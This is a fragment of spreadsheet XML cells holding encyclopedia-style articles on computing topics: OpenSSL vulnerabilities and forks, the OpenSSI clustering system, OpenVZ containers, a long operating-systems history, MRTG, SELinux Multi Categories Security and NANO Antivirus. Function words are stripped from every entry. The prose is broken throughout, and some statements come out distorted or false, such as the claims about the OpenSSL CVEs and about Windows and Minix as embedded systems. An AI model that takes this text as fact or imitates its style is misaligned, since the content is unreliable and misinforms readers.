man-in-the-middle attack, attacker able decrypt modify traffic transit. remote unauthenticated attacker could exploit vulnerability using specially crafted handshake force weak keying material. successful exploitation could lead security bypass condition attacker could gain access potentially sensitive information. attack performed vulnerable client server. openssl clients vulnerable versions openssl versions 0.9.8za, 1.0.0m 1.0.1h. servers known vulnerable openssl 1.0.1 1.0.2-beta1. users openssl servers earlier 1.0.1 advised upgrade precaution. clienthello sigalgs this vulnerability (cve-2015-0291) allows anyone take certificate, read contents modify accurately abuse vulnerability causing certificate crash client server. client connects openssl 1.0.2 server renegotiates invalid signature algorithms extension, null-pointer dereference occurs. this cause attack server. stanford security researcher, david ramos, private exploit presented openssl team, patched issue. openssl classified high-severity issue, noting version 1.0.2 found vulnerable. recovery attack diffie–hellman small subgroups this vulnerability (cve-2016-0701) allows, particular circumstances met, recover openssl server's private diffie–hellman key. adobe system security researcher, antonio sanso, privately reported vulnerability. openssl classified high-severity issue, noting version 1.0.2 found vulnerable. forks agglomerated 2009, frustrations original openssl api, marco peereboom, openbsd developer time, forked original creating agglomerated (assl), reuses openssl hood, provides much simpler external interface. since deprecated light libressl fork circa 2016. libressl april 2014 wake heartbleed, members openbsd project forked openssl starting 1.0.1g branch, create project named libressl. first week pruning openssl's codebase, 90,000 lines code removed fork. boringssl june 2014, google announced fork openssl dubbed boringssl. google plans co-operate openssl libressl developers. google since developed library, tink, based boringssl. also comparison implementations comparison cryptography libraries list free open-source software packages posse project libressl wolfssl notes references external links official website openssl manpages openssl programming guide (archived) openssl license mark mcloughlin openssl programming tutorial openssl community wiki</t>
  </si>
  <si>
    <t>OpenSSI</t>
  </si>
  <si>
    <t>openssi open-source single-system image clustering system. allows collection computers treated large system, allowing applications running machine access resources machines cluster.openssi based linux operating system released open source project compaq 2001. final stage long process development, stretching back locus, developed early 1980s. description openssi allows cluster individual computers (nodes) treated large system. processes node full access resources nodes. processes migrated node node automatically balance system utilization. inbound network connections directed least loaded node available. openssi designed used high performance high availability clusters. possible create openssi cluster single point failure, example file system mirrored nodes, node crashes process accessing file fail node. alternatively cluster designed manner every node direct access file system. features single process space openssi provides single process space every process visible every node, managed node using normal linux commands (ps, kill, renice on). linux /proc virtual filesystem shows running processes nodes. implementation single process space accomplished using vproc abstraction invented locus osf/1 operating system. migration openssi allows migration running processes nodes. when running processes migrated continue access open files, objects network connections. processes manually migrated, either process calling special openssi migrate(2) system call, writing node number special file processes /proc directory. processes also, user wants, automatically migrated order balance load across cluster. openssi uses algorithm developed mosix project determining load node. single root openssi provides single root cluster node files directories available. openssi uses several mechanisms provide single root (the openssi cluster file system), cluster filesystems parallel mounts network file systems. openssi uses context dependent symbolic link (cdsl) feature, inspired hp's trucluster system, allow access node-specific files manner transparent cluster-aware applications. cdsl point different files node cluster. cfs, openssi cluster file system provides transparent inter-node access underlying real file system node. stacked real file system co-ordinates access different nodes using token mechanism. node physical access underlying file system performs read write operations. time node owns token, representing part underlying file, implies part file cache owning node. another node tries access part file token stolen cache contents copied stealing node. openssi implementation remarkably similar used trucluster.cfs also used co-ordinate access shared memory segments. used fault tolerant system using shared disk subsystems (dual ported scsi san), using drbd. node currently directly accessing file system crashes mount fails node directly connected disk cluster accesses file system node. clustered file systems openssi based clustered file systems root provided provide posix compatible file system interface. currently lustre tested.with clustered file system, node mounts file system parallel access files goes directly node file system. openssi mounts files systems parallel node. every node accesses server directly. single space openssi provides cluster-wide access devices system, limitations possible node mount block device another node. udev device manager used manage /dev directory. each node runs copy udev create appropriate device nodes subdirectory /dev, /dev/1 node /dev/2 node single space openssi provides internode access standard linux inter-process communication mechanisms, shared memory, semaphores, sysv message queues, pipes unix domain sockets. order implement cluster wide shared memory distributed shared memory openssi uses token system. time memory segment readable nodes, writable node. node without write access segment tries write segment marked unreadable nodes writable current node. node without read access tries read segment current value copied node valid writable marked readable. cluster address openssi uses provide fault-tolerant load balanced services. inbound network connections received director node redirects least loaded server node. node director server). event director node failure another director node takes system continues accept inbound connections. distributions openssi software available various linux distributions. openssi kernel distribution independent various distribution specific linux user level systems need modified, example init process system startup scripts. currently supported distributions are: fedora core debian sargein 2008, work progress port openssi debian etch lenny. history origins openssi date back early 1980s, locus distributed operating system developed ucla. team developed locus went form locus computing corporation produced various versions locus technology several names, culminating development unixware nonstop clusters product tandem computers, time acquired locus team rights technology. nonstop clusters unixware commercialized add-on unixware. when stopped selling nonstop clusters, former locus team, working compaq (which acquired tandem interim), ported nonstop clusters code linux released open source. team compaq continued develop system, called openssi, time acquired compaq. openssi currently developed independent team. also kerrighed openmosix linuxpmi dipc references external links openssi homepage (from archive.org) sourceforge.net project summary page cluster infrastructure project openssi webview homepage popcorn linux</t>
  </si>
  <si>
    <t>OpenVZ</t>
  </si>
  <si>
    <t>openvz (open virtuozzo) operating-system-level virtualization technology linux. allows physical server multiple isolated operating system instances, called containers, virtual private servers (vpss), virtual environments (ves). openvz similar solaris containers lxc. openvz compared virtualization technologies while virtualization technologies vmware, provide full virtualization multiple operating systems different kernel versions, openvz uses single linux kernel therefore linux. openvz containers share architecture kernel version. this disadvantage situations guests require different kernel versions host. however, overhead true hypervisor, fast efficient.memory allocation openvz soft memory used virtual environment used others disk caching. while versions openvz used common file system (where virtual environment directory files isolated using chroot), current versions openvz allow container file system. kernel openvz kernel linux kernel, modified support openvz containers. modified kernel provides virtualization, isolation, resource management, checkpointing. vzctl 4.0, openvz work unpatched linux kernels, reduced feature set. virtualization isolation each container separate entity, behaves largely physical server would. each own: files system libraries, applications, virtualized /proc /sys, virtualized locks, etc.users groups each container root user, well users groups.process tree container sees processes (starting init). pids virtualized, init be.network virtual network device, allows container addresses, well netfilter (iptables), routing rules.devices needed, container granted access real devices like network interfaces, serial ports, disk partitions, etc.ipc objects shared memory, semaphores, messages. resource management openvz resource management consists four components: two-level disk quota, fair scheduler, disk scheduler, user bean counters (see below). these resources changed container time, eliminating need reboot. two-level disk quota each container disk quotas, measured terms disk blocks inodes (roughly number files). within container, possible standard tools unix per-user per-group disk quotas. scheduler scheduler openvz two-level implementation fair-share scheduling strategy. first level, scheduler decides container give time slice based per-container cpuunits values. second level standard linux scheduler decides process container, using standard linux process priorities. possible different values cpus container. real time distributed proportionally values. addition above, openvz provides ways strict limits, total time (--cpulimit); limit number cores available container (--cpus); bind container specific cpus (--cpumask). scheduler similar scheduler described above, scheduler openvz also two-level, utilizing jens axboe's scheduler second level. each container assigned priority, scheduler distributes available bandwidth according priorities assigned. thus single container saturate channel. user beancounters user beancounters per-container counters, limits, guarantees, meant prevent single container monopolizing system resources. current openvz kernels (rhel6-based 042stab*) primary parameters (ram swap, a.k.a. physpages swappages), others optional.other resources mostly memory various in-kernel objects inter-process communication shared memory segments network buffers. each resource seen /proc/user_beancounters five values associated current usage, maximum usage (for lifetime container), barrier, limit, fail counter. meaning barrier limit parameter-dependent; short, thought soft limit hard limit. resource hits limit, fail counter increased. this allows owner detect problems monitoring /proc/user_beancounters container. checkpointing live migration live migration checkpointing feature released openvz middle april 2006. this makes possible move container physical server another without shutting container. process known checkpointing: container frozen whole state saved file disk. this file transferred another machine container unfrozen (restored) there; delay roughly seconds. because state usually preserved completely, pause appear ordinary computational delay. limitations default, openvz restricts container access real physical devices (thus making container hardware-independent). openvz administrator enable container access various real devices, disk drives, ports, devices physical network cards./dev/loopn often restricted deployments loop devices kernel threads might security issue), restricts ability mount disk images. work-around fuse. openvz limited providing technologies based (such pptp/l2tp) tun/tap. ipsec supported inside containers since kernel 2.6.32. graphical user interface called easyvz attempted 2007, progress beyond version 0.1. version 3.4, proxmox could used openvz-based server virtualization environment gui, although later versions switched lxc. also comparison platform virtualization software operating-system-level virtualization proxmox virtual environment references external links official website</t>
  </si>
  <si>
    <t>Operating system</t>
  </si>
  <si>
    <t>operating system (os) system software manages computer hardware, software resources, provides common services computer programs. time-sharing operating systems schedule tasks efficient system also include accounting software cost allocation processor time, mass storage, printing, resources. hardware functions input output memory allocation, operating system acts intermediary programs computer hardware, although application code usually executed directly hardware frequently makes system calls function interrupted operating systems found many devices contain computer cellular phones video game consoles servers supercomputers. dominant general-purpose personal computer operating system microsoft windows market share around 76.45%. macos apple inc. second place (17.72%), varieties linux collectively third place (1.73%). mobile sector (including smartphones tablets), android's share year 2020. according third quarter 2016 data, android's share smartphones dominant 87.5 percent growth rate 10.3 percent year, followed apple's 12.1 percent year decrease market share percent, operating systems amount percent. linux distributions dominant server supercomputing sectors. other specialized classes operating systems (special-purpose operating systems), embedded real-time systems, exist many applications. security-focused operating systems also exist. some operating systems system requirements (e.g. light-weight linux distribution). others higher system requirements. some operating systems require installation come pre-installed purchased computers (oem-installation), whereas others directly media (i.e. live flash memory (i.e. stick). types operating systems single-tasking multi-tasking single-tasking system program time, multi-tasking operating system allows program running concurrently. this achieved time-sharing, available processor time divided multiple processes. these processes interrupted repeatedly time slices task-scheduling subsystem operating system. multi-tasking characterized preemptive cooperative types. preemptive multitasking, operating system slices time dedicates slot programs. unix-like operating systems, linux—as well non-unix-like, amigaos—support preemptive multitasking. cooperative multitasking achieved relying process provide time processes defined manner. 16-bit versions microsoft windows used cooperative multi-tasking; 32-bit versions windows win9x used preemptive multi-tasking. single- multi-user single-user operating systems facilities distinguish users allow multiple programs tandem. multi-user operating system extends basic concept multi-tasking facilities identify processes resources, disk space, belonging multiple users, system permits multiple users interact system time. time-sharing operating systems schedule tasks efficient system also include accounting software cost allocation processor time, mass storage, printing, resources multiple users. distributed distributed operating system manages group distinct, networked computers makes appear single computer, computations distributed (divided amongst constituent computers). embedded embedded operating systems designed used embedded computer systems. they designed operate small machines less autonomy (e.g. pdas). they compact extremely efficient design able operate limited amount resources. windows minix examples embedded operating systems. real-time real-time operating system operating system guarantees process events data specific moment time. real-time operating system single- multi-tasking, multitasking, uses specialized scheduling algorithms deterministic nature behavior achieved. such event-driven system switches tasks based priorities external events, whereas time-sharing operating systems switch tasks based clock interrupts. library library operating system services typical operating system provides, networking, provided form libraries composed application configuration code construct unikernel: specialized, single address space, machine image deployed cloud embedded environments. history early computers built perform series single tasks, like calculator. basic operating system features developed 1950s, resident monitor functions could automatically different programs succession speed processing. operating systems exist modern complex forms early 1960s. hardware features added, enabled runtime libraries, interrupts, parallel processing. when personal computers became popular 1980s, operating systems made similar concept used larger computers. 1940s, earliest electronic digital systems operating systems. electronic systems time programmed rows mechanical switches jumper wires plugboards. these special-purpose systems that, example, generated ballistics tables military controlled printing payroll checks data punched paper cards. after programmable general-purpose computers invented, machine languages(consisting strings binary digits punched paper tape) introduced sped programming process (stern, 1981). early 1950s, computer could execute program time. each user sole computer limited period would arrive scheduled time program data punched paper cards punched tape. program would loaded machine, machine would work program completed crashed. programs could generally debugged front panel using toggle switches panel lights. said alan turing master early manchester mark machine, already deriving primitive conception operating system principles universal turing machine.later machines came libraries programs, would linked user's program assist operations input output compiling (generating machine code human-readable symbolic code). this genesis modern-day operating system. however, machines still single time. cambridge university england, queue time washing line (clothesline) tapes hung different colored clothes-pegs indicate priority.by late 1950s, programs would recognize operating system beginning appear. often pointed earliest recognizable example gm-naa i/o, released 1956 704. first known example actually referred share operating system, development gm-naa i/o, released 1959. 1960 paper describing system, george ryckman noted: development computer operating systems materially aided problem getting program series programs computer efficiently. famous examples often found discussions early systems atlas supervisor, running atlas 1962. referred december 1961 article describing system, context "the operating system" along lines "the system operates fashion". atlas team used term "supervisor", widely used along "monitor". brinch hansen described "the significant breakthrough history operating systems." mainframes through 1950s, many major features pioneered field operating systems mainframe computers, including batch processing, input/output interrupting, buffering, multitasking, spooling, runtime libraries, link-loading, programs sorting records files. these features included included application software option application programmers, rather separate operating system used applications. during 1960s, ibm's os/360 introduced concept single spanning entire product line, crucial success system/360 machines. ibm's current mainframe operating systems distant descendants original system modern machines backward compatible applications written os/360.os/360 also pioneered concept operating system keeps track system resources used, including program data space allocation main memory file space secondary storage, file locking updates. when process terminated reason, resources re-claimed operating system. alternative cp-67 system s/360-67 started whole line operating systems focused concept virtual machines. other operating systems used s/360 series mainframes included systems developed ibm: dos/360 (disk operating system), tss/360 (time sharing system), tos/360 (tape operating system), bos/360 (basic operating system), (airline control program), well non-ibm systems: (michigan terminal system), music (multi-user system interactive computing), orvyl (stanford timesharing system). control data corporation developed scope operating system 1960s, batch processing. cooperation university minnesota, kronos later operating systems developed 1970s, supported simultaneous batch timesharing use. like many commercial timesharing systems, interface extension dartmouth basic operating systems, pioneering efforts timesharing programming languages. late 1970s, control data university illinois developed plato operating system, used plasma panel displays long-distance time sharing networks. plato remarkably innovative time, featuring real-time chat, multi-user graphical games. 1961, burroughs corporation introduced b5000 (master control program) operating system. b5000 stack machine designed exclusively support high-level languages assembler; indeed, first written exclusively high-level language (espol, dialect algol). also introduced many ground-breaking innovations, first commercial implementation virtual memory. during development as/400, made approach burroughs license as/400 hardware. this proposal declined burroughs management protect existing hardware production. still today unisys company's mcp/clearpath line computers. univac, first commercial computer manufacturer, produced series exec operating systems. like early main-frame systems, batch-oriented system managed magnetic drums, disks, card readers line printers. 1970s, univac produced real-time basic (rtb) system support large-scale time sharing, also patterned dartmouth system. general electric developed general electric comprehensive operating supervisor (gecos), primarily supported batch processing. after acquisition honeywell, renamed general comprehensive operating system (gcos). bell labs, general electric developed multiplexed information computing service (multics), introduced concept ringed security privilege levels. digital equipment corporation developed many operating systems various computer lines, including tops-10 tops-20 time-sharing systems 36-bit pdp-10 class systems. before widespread unix, tops-10 particularly popular system universities, early arpanet community. rt-11 single-user real-time pdp-11 class minicomputer, rsx-11 corresponding multi-user from late 1960s late 1970s, several hardware capabilities evolved allowed similar ported software system. early systems utilized microprogramming implement features systems order permit different underlying computer architectures appear others series. fact, 360s 360/40 (except 360/44, 360/75, 360/91, 360/95 360/195) microprogrammed implementations. enormous investment software systems made since 1960s caused original computer manufacturers continue develop compatible operating systems along hardware. notable supported mainframe operating systems include: burroughs b5000, 1961 unisys clearpath/mcp, present os/360 system/360, 1966 z/os, present cp-67 system/360, 1967 z/vm univac exec univac 1108, 1967, 2200 unisys clearpath dorado, present microcomputers first microcomputers capacity need elaborate operating systems developed mainframes minis; minimalistic operating systems developed, often loaded known monitors. notable early disk operating system cp/m, supported many early microcomputers closely imitated microsoft's ms-dos, became widely popular operating system chosen (ibm's version called dos). 1980s, apple computer inc. (now apple inc.) abandoned popular apple series microcomputers introduce apple macintosh computer innovative graphical user interface (gui) introduction intel 80386 chip october 1985, 32-bit architecture paging capabilities, provided personal computers ability multitasking operating systems like earlier minicomputers mainframes. microsoft responded progress hiring dave cutler, developed operating system digital equipment corporation. would lead development windows operating system, continues serve basis microsoft's operating systems line. steve jobs, co-founder apple inc., started next computer inc., developed nextstep operating system. nextstep would later acquired apple inc. used, along code freebsd core (macos latest name change). project started activist programmer richard stallman goal creating complete free software replacement proprietary unix operating system. while project highly successful duplicating functionality various parts unix, development hurd kernel proved unproductive. 1991, finnish computer science student linus torvalds, cooperation volunteers collaborating internet, released first version linux kernel. soon merged user space components system software form complete operating system. since then, combination major components usually referred simply "linux" software industry, naming convention stallman free software foundation remain opposed preferring name gnu/linux. berkeley software distribution, known bsd, unix derivative distributed university california, berkeley, starting 1970s. freely distributed ported many minicomputers, eventually also gained following pcs, mainly freebsd, netbsd openbsd. examples unix unix-like operating systems unix originally written assembly language. thompson wrote mainly based bcpl, based experience multics project. replaced unix, rewritten developed large, complex family inter-related operating systems influential every modern operating system (see history). unix-like family diverse group operating systems, several major sub-categories including system bsd, linux. name "unix" trademark open group licenses operating system shown conform definitions. "unix-like" commonly used refer large operating systems resemble original unix. unix-like systems wide variety computer architectures. they used heavily servers business, well workstations academic engineering environments. free unix variants, linux bsd, popular areas. five operating systems certified open group (holder unix trademark) unix. hp's hp-ux ibm's descendants original system unix designed respective vendor's hardware. contrast, microsystems's solaris multiple types hardware, including sparc servers, pcs. apple's macos, replacement apple's earlier (non-unix) hybrid kernel-based variant derived nextstep, mach, freebsd. ibm's z/os unix system services includes shell utilities based mortice kerns' interopen products. unix interoperability sought establishing posix standard. posix standard applied operating system, although originally created various unix variants. descendants subgroup unix family berkeley software distribution family, includes freebsd, netbsd, openbsd. these operating systems commonly found webservers, although also function personal computer internet owes much existence bsd, many protocols commonly used computers connect, send receive data network widely implemented refined bsd. world wide also first demonstrated number computers running based called nextstep. 1974, university california, berkeley installed first unix system. over time, students staff computer science department began adding programs make things easier, text editors. when berkeley received computers 1978 unix installed, school's undergraduates modified unix even order take advantage computer's hardware possibilities. defense advanced research projects agency department defense took interest, decided fund project. many schools, corporations, government organizations took notice started berkeley's version unix instead official distributed at&amp;t. steve jobs, upon leaving apple inc. 1985, formed next inc., company manufactured high-end computers running variation called nextstep. computers used berners-lee first webserver create world wide web. developers like keith bostic encouraged project replace non-free code originated bell labs. once done, however, at&amp;t sued. after years legal disputes, project spawned number free derivatives, netbsd freebsd (both 1993), openbsd (from netbsd 1995). macos macos (formerly "mac later line open core graphical operating systems developed, marketed, sold apple inc., latest pre-loaded currently shipping macintosh computers. macos successor original classic apple's primary operating system since 1984. unlike predecessor, macos unix operating system built technology developed next second half 1980s apple purchased company early 1997. operating system first released 1999 server 1.0, followed march 2001 client version (mac v10.0 "cheetah"). since then, distinct "client" "server" editions macos released, merged 10.7 "lion". prior merging macos, server edition macos server architecturally identical desktop counterpart usually apple's line macintosh server hardware. macos server included work group management administration software tools provide simplified access network services, including mail transfer agent, samba server, ldap server, domain name server, others. with v10.7 lion, server aspects server integrated client version product re-branded (dropping "mac" name). server tools offered application. z/os unix system services first introduced openedition upgrade mvs/esa system product version release announced february 1993 support posix standards. z/os unix system services built services cannot independently. while initially introduced openedition satisfy fips requirements, several z/os component require unix services, e.g., tcp/ip. linux linux kernel originated 1991, project linus torvalds, university student finland. posted information project newsgroup computer students programmers, received support assistance volunteers succeeded creating complete functional kernel. linux unix-like, developed without unix code, unlike variants. because open license model, linux kernel code available study modification, resulted wide range computing machinery supercomputers smartwatches. although estimates suggest linux used 1.82% "desktop" laptop) pcs, widely adopted servers embedded systems cell phones. linux superseded unix many platforms used supercomputers including 385. many computers also green500 (but different order), linux runs linux also commonly used small energy-efficient computers, smartphones smartwatches. linux kernel used popular distributions, hat, debian, ubuntu, linux mint google's android, chrome chromium microsoft windows microsoft windows family proprietary operating systems designed microsoft corporation primarily targeted intel architecture based computers, estimated 88.9 percent total usage share connected computers. latest version windows 2011, windows overtook windows common version use.microsoft windows first released 1985, operating environment running ms-dos, standard operating system shipped intel architecture personal computers time. 1995, windows released used ms-dos bootstrap. backwards compatibility, win9x could real-mode ms-dos 16-bit windows drivers. windows released 2000, last version win9x family. later versions based windows kernel. current client versions windows ia-32, x86-64 microprocessors. addition itanium still supported older server version windows server 2008 past, windows supported additional architectures. server editions windows widely used, however, windows' usage servers widespread personal computers windows competes linux server market share.reactos windows-alternative operating system, developed principles windows without using microsoft's code. other there many operating systems significant longer amigaos; os/2 microsoft; classic non-unix precursor apple's macos; beos; xts-300; risc morphos; haiku; baremetal freemint. some still used niche markets continue developed minority platforms enthusiast communities specialist applications. z/os operating system z/architecture mainframe computers still used developed, openvms, formerly dec, still active development software inc. operating system as/400 power systems midrange computers also still used developed. operating systems used almost exclusively academia, operating systems education research operating system concepts. typical example system fulfills roles minix, example singularity used purely research. another example oberon system designed zürich niklaus wirth, jürg gutknecht group students former computer systems institute 1980s. used mainly research, teaching, daily work wirth's group. other operating systems failed significant market share, introduced innovations influenced mainstream operating systems, least bell labs' plan components components operating system exist order make different parts computer work together. user software needs operating system order hardware, whether simple mouse keyboard complex internet component. kernel with firmware device drivers, kernel provides basic level control computer's hardware devices. manages memory access programs ram, determines programs access hardware resources, sets resets cpu's operating states optimal operation times, organizes data long-term non-volatile storage file systems media disks, tapes, flash memory, etc. program execution operating system provides interface application program computer hardware, application program interact hardware obeying rules procedures programmed operating system. operating system also services simplify development execution application programs. executing application program typically involves creation process operating system kernel, assigns memory space resources, establishes priority process multi-tasking systems, loads program binary code memory, initiates execution application program, interacts user hardware devices. however, systems application request operating system execute another application within process, either subroutine separate thread, e.g., link attach facilities os/360 successors.. interrupts interrupt (also known abort, exception, fault, signal trap) provides efficient operating systems react environment. interrupts cause central processing unit (cpu) control flow change away currently running program interrupt handler, also known interrupt service routine (isr). interrupt service routine cause central processing unit (cpu) context switch details computer processes interrupt vary architecture architecture, details interrupt service routines behave vary operating system operating system. however, several interrupt functions common. architecture operating system must: transfer control interrupt service routine. save state currently running process. restore state interrupt serviced. software interrupt software interrupt message process event occurred. this contrasts hardware interrupt message central processing unit (cpu) event occurred. software interrupts similar hardware interrupts change away currently running process. similarly, hardware software interrupts execute interrupt service routine. software interrupts normally occurring events. expected time slice occur, kernel perform context switch. computer program timer seconds case much data causes algorithm take long.software interrupts error conditions, malformed machine instruction. however, common error conditions division zero accessing invalid memory address.users send messages kernel modify behavior currently running process. example, command-line environment, pressing interrupt character (usually control-c) might terminate currently running process.to generate software interrupts cpus, assembly language instruction available. syntax offset number hexadecimal format) interrupt vector table. signal generate software interrupts unix-like operating systems, kill(pid,signum) system call send signal another process. process identifier receiving process. signum signal number mnemonic format) sent. (the abrasive name kill chosen early implementations terminated process.)in unix-like operating systems, signals inform processes occurrence asynchronous events. communicate asynchronously, interrupts required. reason process needs asynchronously communicate another process solves variation classic reader/writer problem. writer receives pipe shell output sent reader's input stream. command-line syntax alpha bravo. alpha write pipe computation ready sleep wait queue. bravo moved ready queue soon read input stream. kernel generate software interrupts coordinate piping.signals classified categories. categories are: process finishes normally. process error exception. process runs system resource. process executes illegal instruction. process sets alarm event. process aborted keyboard. process tracing alert debugging. hardware interrupt input/output (i/o) devices slower cpu. therefore, would slow computer wait finish. instead, computer implement interrupts completion, avoiding need polling busy waiting.some computers require interrupt character word, costing significant amount time. direct memory access (dma) architecture feature allow devices bypass access main memory directly. (separate architecture, device perform direct memory access main memory either directly bus.) input/output interrupt-driven when computer user types keyboard, typically character appears immediately screen. likewise, user moves mouse, cursor immediately moves across screen. each keystroke mouse movement generates interrupt called interrupt-driven i/o. interrupt-driven occurs process causes interrupt every character word transmitted. direct memory access devices hard disk drives, solid state drives, magnetic tape drives transfer data rate high enough interrupting every byte word transferred, transfer byte word device memory, would require much time. data instead, transferred device memory independently hardware channel direct memory access controller; interrupt delivered data transferred.if computer program executes system call perform block write operation, system call might execute following instructions: contents cpu's registers (including program counter) process control block. create entry device-status table. operating system maintains table keep track processes waiting devices. field table memory address process control block. place characters sent device memory buffer. memory address memory buffer predetermined device register. buffer size integer) another predetermined register. execute machine instruction begin writing. perform context switch next process ready queue.while writing takes place, operating system context switch processes normal. when device finishes writing, device interrupt currently running process asserting interrupt request. device also place integer onto data bus. upon accepting interrupt request, operating system will: push contents program counter register) followed status register onto call stack. push contents registers onto call stack. (alternatively, contents registers placed system table.) read integer data bus. integer offset interrupt vector table. vector table's instructions then:access device-status table. extract process control block. perform context switch back writing process.when writing process time slice expired, operating system will: call stack registers status register program counter. call stack status register. call stack address next instruction, back program counter.with program counter reset, interrupted process resume time slice. modes modern computers support multiple modes operation. cpus capability offer least modes: user mode supervisor mode. general terms, supervisor mode operation allows unrestricted access machine resources, including instructions. user mode operation sets limits instruction typically disallows direct access machine resources. cpus might modes similar user mode well, virtual modes order emulate older processor types, 16-bit processors 32-bit one, 32-bit processors 64-bit one. power-on reset, system begins supervisor mode. once operating system kernel loaded started, boundary user mode supervisor mode (also known kernel mode) established. supervisor mode used kernel level tasks need unrestricted access hardware, controlling memory accessed, communicating devices disk drives video display devices. user mode, contrast, used almost everything else. application programs, word processors database managers, operate within user mode, access machine resources turning control kernel, process causes switch supervisor mode. typically, transfer control kernel achieved executing software interrupt instruction, motorola 68000 trap instruction. software interrupt causes processor switch user mode supervisor mode begin executing code allows kernel take control. user mode, programs usually access restricted processor instructions, generally cannot execute instructions could potentially cause disruption system's operation. supervisor mode, instruction execution restrictions typically removed, allowing kernel unrestricted access machine resources. term "user mode resource" generally refers registers, contain information running program allowed alter. attempts alter resources generally cause switch supervisor mode, operating system deal illegal operation program attempting; example, forcibly terminating ("killing") program. memory management among things, multiprogramming operating system kernel must responsible managing system memory currently programs. this ensures program interfere memory already another program. since programs time share, program must independent access memory. cooperative memory management, used many early operating systems, assumes programs make voluntary kernel's memory manager, exceed allocated memory. this system memory management almost never seen more, since programs often contain bugs cause exceed allocated memory. program fails, cause memory used programs affected overwritten. malicious programs viruses purposefully alter another program's memory, affect operation operating system itself. with cooperative memory management, takes misbehaved program crash system. memory protection enables kernel limit process' access computer's memory. various methods memory protection exist, including memory segmentation paging. methods require level hardware support (such 80286 mmu), exist computers. segmentation paging, certain protected mode registers specify memory address allow running program access. attempts access addresses trigger interrupt, causes re-enter supervisor mode, placing kernel charge. this called segmentation violation seg-v short, since difficult assign meaningful result operation, usually sign misbehaving program, kernel generally resorts terminating offending program, reports error. windows versions level memory protection, programs could easily circumvent need general protection fault would produced, indicating segmentation violation occurred; however, system would often crash anyway. virtual memory virtual memory addressing (such paging segmentation) means kernel choose memory program given time, allowing operating system memory locations multiple tasks. program tries access memory current range accessible memory, nonetheless allocated kernel interrupted would program exceed allocated memory. (see section memory management.) under unix kind interrupt referred page fault. when kernel detects page fault generally adjusts virtual memory range program triggered granting access memory requested. this gives kernel discretionary power particular application's memory stored, even whether actually allocated yet. modern operating systems, memory accessed less frequently temporarily stored disk media make space available programs. this called swapping, area memory used multiple programs, memory area contains swapped exchanged demand. "virtual memory" provides programmer user perception much larger amount computer really there. multitasking multitasking refers running multiple independent computer programs computer, giving appearance performing tasks time. since computers things time, generally done time-sharing, means program uses share computer's time execute. operating system kernel contains scheduling program determines much time process spends executing, order execution control passed programs. control passed process kernel, allows program access memory. later, control returned kernel mechanism, another program allowed cpu. this so-called passing control kernel applications called context switch. early model governed allocation time programs called cooperative multitasking. model, control passed program kernel, execute long wants explicitly returning control kernel. this means malicious malfunctioning program prevent programs using cpu, hang entire system enters infinite loop. modern operating systems extend concepts application preemption device drivers kernel code, operating system preemptive control internal run-times well. philosophy governing preemptive multitasking ensuring programs given regular time cpu. this implies programs must limited much time allowed spend without interrupted. accomplish this, modern operating system kernels make timed interrupt. protected mode timer kernel triggers return supervisor mode specified time elapsed. (see sections interrupts dual mode operation.) many single user operating systems cooperat</t>
  </si>
  <si>
    <t>Multi Router Traffic Grapher</t>
  </si>
  <si>
    <t>multi router traffic grapher (mrtg) free software monitoring measuring traffic load network links. allows user traffic load network time graphical form. originally developed tobias oetiker dave rand monitor router traffic, developed tool create graphs statistics almost anything. mrtg written perl windows, linux, unix, netware. works snmp mrtg uses simple network management protocol (snmp) send requests object identifiers (oids) device. device, must snmp-enabled, management information base (mib) look oids specified. after collecting information send back data encapsulated snmp protocol. mrtg records data client along previously recorded data device. software creates html document logs, containing list graphs detailing traffic selected devices server. script output alternatively, mrtg configured script command, parse output counter values. mrtg website contains large library external scripts enable monitoring database statistics, firewall rules, rpms, virtually integer-value data. features measures values input, output) target. gets data snmp agent, output command line. typically collects data every five minutes configured collect data less frequently). creates html page target features four graphs (gif images). results plotted time day, week, month year graphs, plotted full green area, blue line. automatically scales axis graphs show detail. adds calculated max, average current values target's html page. also send warning emails targets values certain threshold. also rrdtool reimplementation mrtg's graphing logging features munin another monitoring application interface, based rrdtool cacti similar tool using rrdtool references external links mrtg home page "mrtg". freecode. helpful page example mrtg grabs explanations. solaris enterprise linux mrtg configuration how-to mrtgext module supporting mrtg nagios monitoring systems novell servers project trend view mrtg frontend windows mrtg-xtra, windows distribution mrtg --discontinued--</t>
  </si>
  <si>
    <t>Multi categories security</t>
  </si>
  <si>
    <t>multi categories security (mcs) access control method security-enhanced linux uses categories attached objects (files) granted subjects (processes, ...) operating system level. implementation fedora core advisory nothing stopping process increasing access. eventual make hierarchical mandatory access control system. currently, controls access files ptrace kill processes. decided level control access directories file system objects. still evolving.mcs access controls applied domain-type access controls regular (unix permissions). default policy fedora core possible manage categories c255). possible recompile policy much larger number categories required. part multi-level security (mls) development work applications cups print server understand sensitivity labels, cups control printing label printed pages according sensitivity level. data stored manipulated data, therefore program modified support also expected support mls. this increase number applications supporting therefore make easier (which reasons developing mcs). note sub-set mls, bell–lapadula model applied. process clearance dominates classification file gets read write access. example commercial environment might categories data different departments. could data financial data. user running categories read data write file labeled financial data. corporate environment usually regarded acceptable, user trusted financial access integrity skills trusted ensure data mistakenly released wrong file. secret military data regarded unacceptable bell–lapadula model prevents accidental malicious relabeling data. references</t>
  </si>
  <si>
    <t>NANO Antivirus</t>
  </si>
  <si>
    <t>nano antivirus russian antivirus software developed nano security ltd. software free paid (nano antivirus pro) versions. nano security russian company founded 2009 team developed implemented antivirus software since 2003. nano security integrated security maintenance microsoft. company included microsoft's list reputable antimalware producers.the software intended homes small businesses. 2017, nano antivirus included russian software registry ministry telecom mass communications russian federation. awards nano antivirus failed pass vb100 certification first attempt, since earned five consecutive vb100 awards. award streak interrupted failed certification, nano antivirus earned vb100 including last certification. vb100 team commended product's quality. other products company based nano antivirus technologies nano antivirus paid version nano antivirus extended functionality, uses dynamic licensing model. nano antivirus white label platform developing co-branded versions nano antivirus. nano antivirus engine (sdk) product development independent third-party antivirus solutions based nano antivirus technology. this product also allows integrate antivirus technology existing third-party solutions. nano antivirus scan windows store application windows 8/10 provides easy-to-use access nano antivirus cloud scan service. desktop version nano antivirus installed target device, nano antivirus scan also used native metro-style shell desktop solution. nano antivirus online scanner application allows user scan suspicious file right browser. functional online scanner also available special form embedding third-party sites. online scanners nano antivirus integrated following online scanners: virustotal, opswat metadefender, virscan.org engine supplier certified partner. patents technologies nano security patented europe, usa, russia, china countries. also comparison antivirus software references external links official website</t>
  </si>
  <si>
    <t>NAT traversal</t>
  </si>
  <si>
